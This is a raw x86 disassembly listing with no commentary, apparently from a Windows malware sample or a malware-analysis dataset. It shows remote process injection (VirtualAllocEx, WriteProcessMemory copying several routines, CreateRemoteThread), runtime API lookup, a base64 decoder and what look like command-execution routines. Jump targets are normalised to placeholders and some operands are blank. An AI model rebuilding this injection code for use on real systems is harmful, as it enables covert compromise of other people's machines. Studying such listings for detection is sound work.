push eax
lea eax [ ebp - 0x57c ]
push eax
push esi
call [ ebp - 0x40 ]
test eax eax
je r-xdata
sub eax 0x7
je r-xdata
lea eax [ ebp - 0x134 ]
push 0x80
push eax
call [ ebp - 0x10 ]
lea eax [ esi + 0x4dc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x14 ]
lea eax [ esi + 0x4fc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ esi + 0x34 ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x37c ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x134 ]
push eax
lea eax [ ebp - 0x57c ]
push eax
push esi
call [ ebp - 0x40 ]
jmp r-xdata
sub eax 0x44
je r-xdata
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
push [ esi + 0x4c4 ]
push ebx
cmp [ ebp - 0x18 ] ebx
je r-xdata
lea eax [ ebp - 0x134 ]
push 0x80
push eax
call [ ebp - 0x10 ]
lea eax [ esi + 0x4dc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x14 ]
lea eax [ esi + 0x4fc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ esi + 0x34 ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x37c ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x134 ]
push eax
lea eax [ ebp - 0x57c ]
push eax
push esi
call [ ebp - 0x40 ]
test eax eax
je r-xdata
sub eax 0x5
je r-xdata
dec eax
jmp r-xdata
push 0x44
lea eax [ ebp - 0x178 ]
pop edi
push edi
push eax
call [ ebp - 0x10 ]
lea eax [ ebp - 0x94 ]
push 0x10
push eax
mov [ ebp - 0x178 ] edi
call [ ebp - 0x10 ]
lea eax [ ebp - 0x94 ]
push eax
lea eax [ ebp - 0x178 ]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
lea eax [ ebp - 0x57c ]
push ebx
push eax
push ebx
call [ ebp - 0x60 ]
test eax eax
je r-xdata
lea eax [ ebp - 0x47c ]
push eax
lea eax [ ebp - 0x57c ]
push eax
call edi
lea eax [ ebp - 0x57c ]
push eax
call [ esi + 0x698 ]
mov edi eax
cmp edi ebx
je r-xdata
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
cmp [ ebp - 0x67b ] 0x75
jne r-xdata
dec eax
je r-xdata
je r-xdata
push [ ebp - 0x94 ]
call [ ebp - 0x30 ]
push [ ebp - 0x90 ]
call [ ebp - 0x30 ]
cmp [ ebp - 0x24 ] ebx
je r-xdata
push [ esi + 0x4c8 ]
cmp [ ebp - 0x67a ] 0x69
jne r-xdata
cmp [ ebp - 0x24 ] ebx
je r-xdata
dec eax
je r-xdata
lea eax [ esi + 0xa6e ]
push eax
push edi
call [ esi + 0x69c ]
lea ecx [ ebp - 0x38 ]
push ecx
push ebx
push [ ebp - 0x18 ]
push eax
push ebx
push ebx
call [ ebp - 0x34 ]
jmp r-xdata
push [ ebp - 0x24 ]
call [ ebp - 0x30 ]
push esi
call [ ebp - 0xc ]
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
jmp r-xdata
cmp [ ebp - 0x679 ] 0x74
je r-xdata
lea edi [ esi + 0x378 ]
push 0x40
push edi
call [ ebp - 0x10 ]
lea eax [ ebp - 0x37c ]
push eax
push edi
call [ ebp - 0x14 ]
lea eax [ ebp - 0x38 ]
push eax
push ebx
push esi
push [ ebp - 0x58 ]
push ebx
push ebx
call [ ebp - 0x34 ]
mov [ ebp - 0x24 ] eax
push eax
mov eax edx
add eax ecx
mov eax 0x1
sub eax 0x5
pop eax
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
jmp r-xdata
push [ ebp - 0x24 ]
call [ ebp - 0x30 ]
lea eax [ ebp - 0x37c ]
push eax
call [ ebp - 0x50 ]
pop ecx
mov edi eax
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
push edi
jmp r-xdata
push [ ebp - 0x4 ]
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
push [ esi + 0x4c0 ]
jmp r-xdata
push 0x1
jmp r-xdata
sub_4024c9
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x44
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor edi edi
mov [ ebp - 0x1c ] edi
mov [ ebp - 0x20 ] edi
mov [ ebp - 0x4 ] edi
mov [ ebp - 0x54 ] edi
push 0x4
push 0x1000
push 0xd42
push edi
push [ ebp + 0x8 ]
mov esi [ VirtualAllocEx@IAT ]
call esi
mov [ ebp - 0x54 ] eax
cmp eax edi
je r-xdata
or [ ebp - 0x4 ] 0xffffffff
call $+5
cmp [ ebp + 0x8 ] 0x0
je r-xdata
push 0x40
push 0x3000
push 0xf000
push edi
push [ ebp + 0x8 ]
call esi
mov [ ebp - 0x28 ] eax
cmp eax edi
je r-xdata
call sub_4019cc
test eax eax
jne r-xdata
push [ ebp + 0x8 ]
call [ CloseHandle@IAT ]
mov [ ebp - 0x38 ] eax
lea edi [ eax + 0x2000 ]
mov [ ebp - 0x34 ] edi
lea ebx [ edi + 0x2000 ]
mov [ ebp - 0x30 ] ebx
lea ecx [ ebx + 0x2000 ]
mov [ ebp - 0x4c ] ecx
lea edx [ ecx + 0x2000 ]
mov [ ebp - 0x48 ] edx
lea esi [ edx + 0x2000 ]
mov [ ebp - 0x24 ] esi
add esi 0x1000
mov [ ebp - 0x44 ] esi
add esi 0x1000
mov [ ebp - 0x40 ] esi
add esi 0x1000
mov [ ebp - 0x3c ] esi
mov [ rw-data ] eax
mov [ rw-data ] edi
mov [ rw-data ] ebx
mov [ rw-data ] ecx
mov [ rw-data ] edx
mov eax [ ebp - 0x24 ]
mov [ rw-data ] eax
mov eax [ ebp - 0x44 ]
mov [ rw-data ] eax
mov eax [ ebp - 0x40 ]
mov [ rw-data ] eax
mov [ rw-data ] esi
add esi 0x1000
mov [ rw-data ] esi
push ecx
and ecx 0x1
sub ecx 0x1
pop ecx
lea eax [ ebp - 0x1c ]
push eax
push 0xd42
push rw-data
push [ ebp - 0x54 ]
push [ ebp + 0x8 ]
mov esi [ WriteProcessMemory@IAT ]
call esi
test eax eax
je r-xdata
mov esp [ ebp - 0x18 ]
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
leave
retn 0x4
call sub_402730
push 0x0
push 0x2000
push sub_401bf5
push [ ebp - 0x28 ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
push 0x0
push 0x2000
push sub_40280b
push edi
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
mov edi 0x2000
push edi
push sub_40335c
push ebx
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
push edi
push sub_4037c6
push [ ebp - 0x4c ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
push edi
push sub_40380d
push [ ebp - 0x48 ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
mov edi 0x1000
push edi
push sub_402f3b
push [ ebp - 0x24 ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
push edi
push sub_402e5e
push [ ebp - 0x44 ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
push edi
push sub_403026
push [ ebp - 0x40 ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x1c ]
push eax
push edi
push sub_40384a
push [ ebp - 0x3c ]
push [ ebp + 0x8 ]
call esi
test eax eax
je r-xdata
lea eax [ ebp - 0x20 ]
push eax
xor eax eax
push eax
push [ ebp - 0x54 ]
push [ ebp - 0x28 ]
push eax
push eax
push [ ebp + 0x8 ]
call [ CreateRemoteThread@IAT ]
mov [ ebp - 0x50 ] eax
sub_402730
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x14
push ebx
push esi
push edi
xor ebx ebx
mov [ ebp - 0x4 ] ebx
mov edi rw-data
mov [ ebp - 0x24 ] edi
mov esi sub_401bf5
mov [ rw-data ] esi
mov [ rw-data ] sub_40280b
mov [ rw-data ] sub_40335c
mov [ rw-data ] sub_4037c6
mov [ rw-data ] sub_40380d
mov [ rw-data ] sub_402f3b
mov [ rw-data ] sub_402e5e
mov [ rw-data ] sub_403026
mov [ rw-data ] sub_40384a
push 0x2000
call malloc
pop ecx
mov [ rw-data ] eax
lea eax [ ebp - 0x20 ]
push eax
push ebx
push edi
push esi
push ebx
push ebx
call [ CreateThread@IAT ]
mov [ ebp - 0x1c ] eax
push 0xffffffff
push eax
call [ WaitForSingleObject@IAT ]
or [ ebp - 0x4 ] 0xffffffff
call sub_4027fe
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40280b
push ebp
mov ebp esp
sub esp 0xa28
push ebx
push esi
mov esi [ ebp + 0x8 ]
push edi
lea eax [ esi + 0x6d4 ]
push eax
call [ esi + 0x698 ]
xor ebx ebx
mov [ ebp - 0x14 ] eax
cmp eax ebx
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x8
lea eax [ esi + 0x6a4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
cmp edi ebx
mov [ ebp - 0x4c ] edi
je r-xdata
lea eax [ esi + 0x6c4 ]
push eax
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0x7a4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x40 ] eax
je r-xdata
lea eax [ esi + 0x850 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x78 ] eax
je r-xdata
lea eax [ esi + 0xa8e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x5c ] eax
je r-xdata
lea eax [ esi + 0x840 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x50 ] eax
je r-xdata
lea eax [ esi + 0xc3e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x28 ] eax
je r-xdata
mov eax [ esi + 0xd2e ]
cmp eax ebx
mov [ ebp - 0x2c ] eax
je r-xdata
mov eax [ esi + 0xd32 ]
cmp eax ebx
mov [ ebp - 0x6c ] eax
je r-xdata
mov eax [ esi + 0xd3a ]
cmp eax ebx
mov [ ebp - 0x3c ] eax
je r-xdata
lea edi [ esi + 0x9a6 ]
push edi
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x24 ] eax
je r-xdata
lea eax [ esi + 0x976 ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x34 ] eax
je r-xdata
lea eax [ esi + 0x97e ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x84 ] eax
je r-xdata
push edi
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x7c ] eax
je r-xdata
lea eax [ esi + 0x9be ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x20 ] eax
je r-xdata
lea eax [ esi + 0x9ce ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x44 ] eax
je r-xdata
mov edi [ ebp - 0x4c ]
lea eax [ esi + 0xc4e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x80 ] eax
je r-xdata
lea eax [ esi + 0xc8e ]
push eax
push [ ebp - 0x14 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x8c ] eax
je r-xdata
lea eax [ esi + 0xc5e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x18 ] eax
je r-xdata
lea eax [ esi + 0x8b4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x8 ] eax
je r-xdata
lea eax [ esi + 0xc36 ]
push eax
push [ ebp - 0x14 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x30 ] eax
je r-xdata
lea eax [ esi + 0xcbe ]
push eax
push [ ebp - 0x14 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x48 ] eax
je r-xdata
lea eax [ esi + 0xcce ]
push eax
push [ ebp - 0x14 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x88 ] eax
je r-xdata
lea eax [ esi + 0xa9e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x70 ] eax
je r-xdata
lea eax [ esi + 0x77c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x1c ] eax
je r-xdata
lea eax [ esi + 0x7d8 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x74 ] eax
je r-xdata
push 0x4a
xor eax eax
pop ecx
lea edi [ ebp - 0x31b ]
mov [ ebp - 0x31c ] bl
mov [ ebp - 0xa28 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx 0xff
xor eax eax
lea edi [ ebp - 0xa27 ]
mov [ ebp - 0x68 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
xor eax eax
lea edi [ ebp - 0x67 ]
stosd [ edi ]
stosd [ edi ]
stosb [ edi ]
mov edi [ esi + 0x704 ]
mov [ ebp - 0x4 ] ebx
cmp edi ebx
mov [ ebp - 0xc ] ebx
mov [ ebp - 0x58 ] 0x6
mov [ ebp - 0x54 ] ebx
je r-xdata
mov [ ebp - 0x98 ] 0xc
mov [ ebp - 0x94 ] ebx
mov [ ebp - 0x90 ] 0x1
cmp [ ebp - 0x4 ] ebx
je r-xdata
lea eax [ ebp - 0xdc ]
mov [ ebp - 0xdc ] 0x44
push eax
call [ ebp - 0x50 ]
mov eax [ ebp - 0xc ]
mov [ ebp - 0xac ] bx
mov [ ebp - 0x9c ] eax
mov [ ebp - 0xa0 ] eax
lea eax [ esi + 0xd0e ]
mov [ ebp - 0xb0 ] 0x101
push eax
lea eax [ ebp - 0x31c ]
push eax
call [ ebp - 0x18 ]
push 0x1000
push edi
call [ ebp - 0x8 ]
lea eax [ ebp - 0x420 ]
push eax
push edi
call [ ebp - 0x18 ]
push edi
call [ ebp - 0x28 ]
mov [ ebp - 0x10 ] eax
push eax
mov al [ esi + 0x15 ]
push eax
push edi
call [ ebp - 0x2c ]
mov eax [ ebp + 0xc ]
mov [ ebp - 0x1f0 ] 0x1
mov [ ebp - 0x1ec ] eax
lea eax [ ebp - 0x58 ]
push eax
lea eax [ ebp - 0x1f0 ]
push ebx
push eax
push ebx
push ebx
call [ ebp - 0x24 ]
cmp eax 0xffffffff
je r-xdata
cmp [ ebp - 0xc ] ebx
je r-xdata
push [ ebp - 0x4 ]
call [ ebp - 0x1c ]
call [ ebp - 0x44 ]
jmp r-xdata
lea eax [ ebp - 0x1f0 ]
push eax
push [ ebp + 0xc ]
call [ ebp - 0x20 ]
test eax eax
je r-xdata
push [ ebp + 0x8 ]
add esi 0x6a0
call [ esi ]
push [ ebp - 0x4c ]
call [ esi ]
push [ ebp - 0x14 ]
call [ esi ]
push [ ebp - 0xc ]
call [ ebp - 0x1c ]
mov eax [ ebp + 0xc ]
push 0x1000
push edi
mov [ ebp - 0x520 ] eax
mov [ ebp - 0x524 ] 0x1
call [ ebp - 0x8 ]
push ebx
push ebx
lea eax [ ebp - 0x524 ]
push ebx
push eax
push ebx
call [ ebp - 0x24 ]
cmp eax 0xffffffff
je r-xdata
push ebx
push 0x4
lea eax [ ebp - 0x68 ]
push 0xa
push eax
push [ ebp - 0x10 ]
call [ ebp - 0x30 ]
add esp 0xc
push eax
push [ ebp + 0xc ]
call [ ebp - 0x34 ]
push [ ebp - 0x10 ]
push edi
push [ ebp + 0xc ]
push esi
call [ ebp - 0x3c ]
lea eax [ ebp - 0x524 ]
push eax
push [ ebp + 0xc ]
call [ ebp - 0x20 ]
test eax eax
je r-xdata
lea eax [ ebp - 0x98 ]
push ebx
push eax
lea eax [ ebp - 0xc ]
push eax
lea eax [ ebp - 0x4 ]
push eax
mov [ ebp - 0x38 ] ebx
call [ ebp - 0x5c ]
test eax eax
je r-xdata
push ebx
push 0xfff
push edi
push [ ebp + 0xc ]
call [ ebp - 0x84 ]
cmp eax 0xffffffff
je r-xdata
push [ ebp + 0xc ]
call [ ebp - 0x7c ]
push eax
mov al [ esi + 0x15 ]
push eax
push edi
call [ ebp - 0x6c ]
lea eax [ esi + 0x4cc ]
push 0x4
push eax
push edi
call [ ebp - 0x48 ]
add esp 0xc
test eax eax
je r-xdata
lea eax [ esi + 0x4d4 ]
push 0x2
push eax
push edi
call [ ebp - 0x48 ]
add esp 0xc
test eax eax
jne r-xdata
push edi
call [ ebp - 0x28 ]
push eax
lea eax [ ebp - 0x31c ]
push edi
push eax
call [ ebp - 0x88 ]
add esp 0xc
lea eax [ ebp - 0xec ]
push eax
lea eax [ ebp - 0xdc ]
push eax
push ebx
push ebx
push 0x10
push 0x1
push ebx
lea eax [ ebp - 0x31c ]
push ebx
push eax
push ebx
call [ ebp - 0x70 ]
test eax eax
je r-xdata
lea eax [ esi + 0x4d4 ]
push eax
push edi
call [ ebp - 0x8c ]
pop ecx
add eax 0x3
pop ecx
push eax
lea eax [ ebp - 0x628 ]
push eax
call [ ebp - 0x80 ]
lea eax [ ebp - 0x628 ]
push eax
call [ ebp - 0x78 ]
test eax eax
jne r-xdata
lea eax [ ebp - 0x31c ]
push 0x12c
push eax
call [ ebp - 0x8 ]
push [ ebp - 0xc ]
call [ ebp - 0x1c ]
lea eax [ ebp - 0x420 ]
push eax
push 0x104
call [ ebp - 0x40 ]
lea eax [ esi + 0x4d8 ]
push eax
lea eax [ ebp - 0x420 ]
push eax
call [ ebp - 0x18 ]
push [ ebp - 0x4 ]
call [ ebp - 0x1c ]
jmp r-xdata
push 0x1000
push edi
call [ ebp - 0x8 ]
lea eax [ ebp - 0xa28 ]
push eax
push edi
call [ ebp - 0x18 ]
push edi
call [ ebp - 0x28 ]
mov [ ebp - 0x10 ] eax
push eax
mov al [ esi + 0x15 ]
push eax
push edi
call [ ebp - 0x2c ]
lea eax [ ebp - 0x68 ]
push 0xa
push eax
push [ ebp - 0x10 ]
call [ ebp - 0x30 ]
mov eax [ ebp + 0xc ]
add esp 0xc
mov [ ebp - 0x1ec ] eax
lea eax [ ebp - 0x58 ]
push eax
lea eax [ ebp - 0x1f0 ]
push ebx
push eax
push ebx
push ebx
mov [ ebp - 0x1f0 ] 0x1
call [ ebp - 0x24 ]
cmp eax 0xffffffff
je r-xdata
lea eax [ ebp - 0x1f0 ]
push eax
push [ ebp + 0xc ]
call [ ebp - 0x20 ]
test eax eax
je r-xdata
lea eax [ ebp - 0xa28 ]
push 0x400
push eax
call [ ebp - 0x8 ]
lea eax [ ebp - 0x38 ]
push ebx
push eax
lea eax [ ebp - 0xa28 ]
push 0x3ff
push eax
push [ ebp - 0x4 ]
call [ ebp - 0x74 ]
cmp [ ebp - 0x38 ] ebx
je r-xdata
push ebx
lea eax [ ebp - 0x68 ]
push 0x4
push eax
push [ ebp + 0xc ]
call [ ebp - 0x34 ]
cmp eax 0xffffffff
je r-xdata
push [ ebp - 0x10 ]
push edi
push [ ebp + 0xc ]
push esi
call [ ebp - 0x3c ]
jmp r-xdata
sub_402e5e
push ebp
mov ebp esp
sub esp 0x114
push ebx
push esi
mov esi [ ebp + 0x8 ]
push edi
lea eax [ esi + 0x6c4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
xor ebx ebx
cmp edi ebx
je r-xdata
or eax 0xffffffff
jmp r-xdata
lea eax [ esi + 0x976 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x4 ] eax
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x10
lea eax [ esi + 0x9be ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x8 ] eax
je r-xdata
lea eax [ esi + 0x9a6 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
mov edi [ ebp + 0x14 ]
mov [ ebp - 0x10 ] ebx
cmp edi ebx
mov [ ebp - 0xc ] 0x493e0
jle r-xdata
mov eax [ ebp + 0x14 ]
mov esi [ ebp + 0xc ]
cmp edi ebx
jg r-xdata
push ebx
push edi
push [ ebp + 0x10 ]
push esi
call [ ebp - 0x4 ]
cmp eax ebx
jl r-xdata
lea eax [ ebp - 0x10 ]
mov [ ebp - 0x110 ] esi
push eax
lea eax [ ebp - 0x114 ]
push ebx
push eax
push ebx
push ebx
mov [ ebp - 0x114 ] 0x1
call [ ebp + 0x8 ]
lea eax [ ebp - 0x114 ]
push eax
push esi
call [ ebp - 0x8 ]
test eax eax
je r-xdata
je r-xdata
mov eax [ ebp + 0x14 ]
sub eax edi
jmp r-xdata
add [ ebp + 0x10 ] eax
sub edi eax
sub_402f3b
push ebp
mov ebp esp
sub esp 0x10
push ebx
push esi
mov esi [ ebp + 0x8 ]
push edi
lea eax [ esi + 0x6a4 ]
lea edi [ esi + 0x698 ]
push eax
call [ edi ]
test eax eax
mov [ ebp - 0x4 ] eax
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0xc
lea eax [ esi + 0x6d4 ]
push eax
call [ edi ]
mov edi eax
test edi edi
mov [ ebp - 0x10 ] edi
je r-xdata
lea eax [ esi + 0xc06 ]
push eax
push edi
call [ esi + 0x69c ]
test eax eax
mov [ ebp - 0xc ] eax
je r-xdata
lea eax [ esi + 0xbfe ]
push eax
push edi
call [ esi + 0x69c ]
test eax eax
mov [ ebp - 0x8 ] eax
je r-xdata
lea eax [ esi + 0xc0e ]
push eax
push edi
call [ esi + 0x69c ]
mov ebx eax
test ebx ebx
je r-xdata
lea eax [ esi + 0x78c ]
push eax
push [ ebp - 0x4 ]
call [ esi + 0x69c ]
test eax eax
mov [ ebp + 0x8 ] eax
je r-xdata
mov eax [ ebp + 0x10 ]
lea edi [ eax + eax * 4 ]
shl edi 0x1
jne r-xdata
cmp [ ebp + 0xc ] 0x0
je r-xdata
push 0x3c
pop edi
imul edi edi 0xea60
push edi
push 0x0
call [ ebp - 0x8 ]
push eax
call [ ebp - 0xc ]
pop ecx
pop ecx
call ebx
xor edx edx
div edi
cmp edx 0x5
ja r-xdata
imul edx edx 0xea60
push edx
jmp r-xdata
push 0x3
pop edx
call [ ebp + 0x8 ]
push [ ebp - 0x10 ]
add esi 0x6a0
call [ esi ]
push [ ebp - 0x4 ]
call [ esi ]
sub_403026
push ebp
mov ebp esp
push ecx
push ebx
push esi
mov esi [ ebp + 0x8 ]
push edi
lea eax [ esi + 0x6d4 ]
push eax
call [ esi + 0x698 ]
mov ebx eax
test ebx ebx
je r-xdata
xor eax eax
lea eax [ esi + 0x6a4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
test edi edi
je r-xdata
lea eax [ esi + 0xc6e ]
push eax
push edi
call [ esi + 0x69c ]
test eax eax
mov [ ebp - 0x4 ] eax
je r-xdata
lea eax [ esi + 0xc8e ]
push eax
push ebx
call [ esi + 0x69c ]
mov ebx eax
test ebx ebx
je r-xdata
lea eax [ esi + 0xc3e ]
push eax
push edi
call [ esi + 0x69c ]
test eax eax
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0x38 ]
push eax
push [ ebp + 0xc ]
call ebx
mov edi eax
pop ecx
test edi edi
pop ecx
je r-xdata
lea eax [ esi + 0x40 ]
push eax
push [ ebp + 0xc ]
call ebx
pop ecx
test eax eax
pop ecx
je r-xdata
sub eax edi
add edi 0x5
sub eax 0x4
lea ebx [ esi + 0x2f8 ]
push eax
push edi
push ebx
call [ ebp - 0x4 ]
push ebx
lea edi [ esi + 0x338 ]
call [ ebp + 0x8 ]
push eax
push ebx
push edi
call sub_40311c
add esp 0xc
cmp [ edi ] 0x75
jne r-xdata
cmp [ esi + 0x339 ] 0x67
jne r-xdata
push edi
call [ ebp + 0x8 ]
dec eax
add esi 0x33a
push eax
push esi
push [ ebp + 0x10 ]
call [ ebp - 0x4 ]
push 0x1
pop eax
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn 0xc
sub_40311c
push ebp
mov ebp esp
sub esp 0x14
mov eax [ ebp + 0x10 ]
push ebx
push esi
mov esi [ ebp + 0xc ]
test eax eax
push edi
jne r-xdata
and [ ebp + 0xc ] 0x0
and [ ebp - 0xc ] 0x0
mov ebx [ ebp + 0x8 ]
lea ecx [ eax - 0x4 ]
test ecx ecx
mov [ ebp - 0x8 ] esi
jle r-xdata
push esi
call strlen
pop ecx
mov [ ebp + 0x10 ] eax
cmp [ ebp - 0xc ] eax
jge r-xdata
lea eax [ ecx + 0x3 ]
shr eax 0x2
mov [ ebp - 0x10 ] eax
lea ecx [ eax + eax * 2 ]
shl eax 0x2
mov [ ebp + 0xc ] ecx
mov [ ebp - 0xc ] eax
and [ ebx ] 0x0
mov eax [ ebp + 0xc ]
pop edi
pop esi
pop ebx
leave
retn
sub eax [ ebp - 0xc ]
xor esi esi
mov [ ebp + 0x10 ] esi
test eax eax
jle r-xdata
mov eax [ ebp - 0x8 ]
mov edi [ eax ]
mov [ ebp + 0x8 ] edi
shr [ ebp + 0x8 ] 0x8
push [ ebp + 0x8 ]
call sub_403310
mov esi eax
push edi
and esi 0xff0
shl esi 0x2
sar esi 0x6
call sub_403310
mov [ ebp - 0x4 ] edi
and eax 0x3f
shr [ ebp - 0x4 ] 0x10
push [ ebp - 0x4 ]
shl eax 0x2
or esi eax
call sub_403310
push [ ebp + 0x8 ]
and eax 0x3fc
shl eax 0x2
sar eax 0x4
mov [ ebp - 0x14 ] eax
call sub_403310
mov ecx [ ebp - 0x14 ]
and eax 0xf
shl eax 0x4
shr edi 0x18
or ecx eax
push edi
mov [ ebp + 0x8 ] ecx
call sub_403310
push [ ebp - 0x4 ]
mov edi eax
and edi 0xff
shl edi 0x2
sar edi 0x2
call sub_403310
and eax 0x3
add [ ebp - 0x8 ] 0x4
shl eax 0x6
or edi eax
add esp 0x18
shl edi 0x8
or edi [ ebp + 0x8 ]
shl edi 0x8
or edi esi
mov [ ebx ] edi
add ebx 0x3
dec [ ebp - 0x10 ]
jne r-xdata
mov eax [ ebp + 0x10 ]
mov [ ebp + 0x10 ] esi
shr [ ebp + 0x10 ] 0x8
push [ ebp + 0x10 ]
call sub_403310
mov edx eax
push esi
shl edx 0x2
sar edx 0x6
mov [ ebp + 0x8 ] edx
call sub_403310
pop ecx
pop ecx
mov ecx [ ebp + 0x8 ]
shl al 0x2
or cl al
mov eax esi
mov [ ebx ] cl
inc ebx
inc [ ebp + 0xc ]
and eax 0xff00
cmp eax 0x3d00
je r-xdata
mov esi [ ebp - 0x8 ]
mov ecx eax
lea edi [ ebp + 0x10 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov esi [ ebp + 0x10 ]
mov eax esi
and eax 0xff0000
cmp eax 0x3d0000
je r-xdata
mov eax esi
and eax 0xff0000
cmp eax 0x3d0000
je r-xdata
mov eax esi
and eax 0xff000000
cmp eax 0x3d000000
je r-xdata
mov eax esi
shr eax 0x10
push eax
call sub_403310
push [ ebp + 0x10 ]
mov edx eax
shl edx 0x2
sar edx 0x4
mov [ ebp + 0x10 ] edx
call sub_403310
pop ecx
pop ecx
mov ecx [ ebp + 0x10 ]
shl al 0x4
or cl al
mov [ ebx ] cl
inc ebx
inc [ ebp + 0xc ]
mov eax esi
shr eax 0x18
push eax
call sub_403310
mov edx eax
shl edx 0x2
shr esi 0x10
sar edx 0x2
push esi
mov [ ebp + 0x10 ] edx
call sub_403310
pop ecx
pop ecx
mov ecx [ ebp + 0x10 ]
shl al 0x6
or cl al
mov [ ebx ] cl
inc ebx
inc [ ebp + 0xc ]
sub_403310
mov cl [ esp + 0x4 ]
or eax 0xffffffff
cmp cl 0x41
jl r-xdata
cmp cl 0x61
jl r-xdata
cmp cl 0x5a
jg r-xdata
cmp cl 0x30
jl r-xdata
cmp cl 0x7a
jg r-xdata
movsx eax cl
sub eax 0x41
retn
cmp cl 0x2b
jne r-xdata
cmp cl 0x39
jg r-xdata
movsx eax cl
sub eax 0x47
retn
cmp cl 0x2f
jne r-xdata
push 0x3e
pop eax
retn
movsx eax cl
add eax 0x4
retn
retn
push 0x3f
pop eax
sub_40335c
push ebp
mov ebp esp
sub esp 0x3ac
push ebx
push esi
mov esi [ ebp + 0x8 ]
push edi
lea eax [ esi + 0x6c4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
xor ebx ebx
cmp edi ebx
mov [ ebp - 0x48 ] edi
je r-xdata
xor eax eax
